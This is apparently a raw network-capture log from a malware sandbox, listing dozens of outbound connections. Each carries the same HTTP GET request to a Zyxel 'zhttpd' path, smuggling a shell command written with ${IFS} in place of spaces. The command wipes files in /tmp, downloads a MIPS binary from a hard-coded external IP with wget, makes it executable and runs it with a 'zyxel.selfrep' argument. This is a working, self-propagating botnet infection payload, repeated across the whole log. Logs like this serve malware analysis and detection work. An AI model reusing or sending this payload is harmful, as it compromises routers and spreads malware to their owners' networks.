                                                Jan 12, 2024 18:24:23.542001963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1337192.168.2.133740642.71.201.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542042971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1338192.168.2.1344012121.236.49.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542081118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1339192.168.2.1333512185.53.129.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542110920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1340192.168.2.1353270211.73.235.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542145967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1341192.168.2.133823072.85.2.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542196035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1342192.168.2.133531418.217.84.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542217016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1343192.168.2.1354464169.24.172.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542265892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1344192.168.2.134839897.17.151.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542294025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1345192.168.2.13567925.241.58.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542347908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1346192.168.2.1337394201.136.154.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542373896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1347192.168.2.136008481.144.226.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542423964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1348192.168.2.136070446.151.5.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542455912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1349192.168.2.134503419.151.195.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542493105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1350192.168.2.1358464196.173.92.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542512894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1351192.168.2.135195843.2.18.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542591095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1352192.168.2.1347634115.89.19.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542623997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1353192.168.2.1336334175.115.107.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542651892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1354192.168.2.1336002141.81.30.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542687893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1355192.168.2.1345074179.44.70.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542737961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1356192.168.2.135583485.182.134.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542768002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1357192.168.2.133887096.136.92.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542824030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1358192.168.2.1346914183.165.45.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542861938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1359192.168.2.134783295.76.16.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542915106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1360192.168.2.134143690.48.4.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542952061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1361192.168.2.1354310163.66.88.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.542985916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1362192.168.2.135014261.235.188.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543014050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1363192.168.2.1347642201.214.7.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543051004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1364192.168.2.1333592134.130.67.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543095112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1365192.168.2.1342028120.110.94.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543106079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1366192.168.2.1356134159.167.47.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543159008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1367192.168.2.134709817.59.96.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543217897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1368192.168.2.1343540135.192.191.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543246984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1369192.168.2.133690067.3.10.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543308973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1370192.168.2.1334614182.201.194.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543349981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1371192.168.2.133973259.144.171.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543394089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1372192.168.2.1360376140.228.85.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543426037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1373192.168.2.1360834186.167.64.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543473959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1374192.168.2.133919673.28.165.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543509007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1375192.168.2.133339448.205.108.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543533087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1376192.168.2.134714680.16.240.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543581963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1377192.168.2.1358756195.234.64.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543637037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1378192.168.2.1340908136.89.9.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543673992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1379192.168.2.1344004125.192.44.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543706894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1380192.168.2.134225046.178.239.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543759108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1381192.168.2.135148441.24.174.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543782949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1382192.168.2.1339888162.143.110.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543832064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1383192.168.2.135326264.61.191.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543864012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1384192.168.2.1357628125.80.189.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543912888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1385192.168.2.134326288.83.121.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543937922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1386192.168.2.133394654.229.134.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.543978930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1387192.168.2.13432101.91.23.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544015884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1388192.168.2.1344288192.17.31.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544070005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1389192.168.2.133935678.110.186.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544106960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1390192.168.2.133917670.79.105.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544137001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1391192.168.2.133361296.71.130.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544162035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1392192.168.2.1338060203.195.166.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544203997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1393192.168.2.133892414.131.8.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544264078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1394192.168.2.1334272137.209.150.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544306993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1395192.168.2.13512561.148.76.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544342041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1396192.168.2.1357372192.134.65.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544383049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1397192.168.2.1344948183.205.214.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544406891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1398192.168.2.133990818.48.64.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.544459105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1399192.168.2.1360346126.15.214.25443
                                                TimestampBytes transferredDirectionData
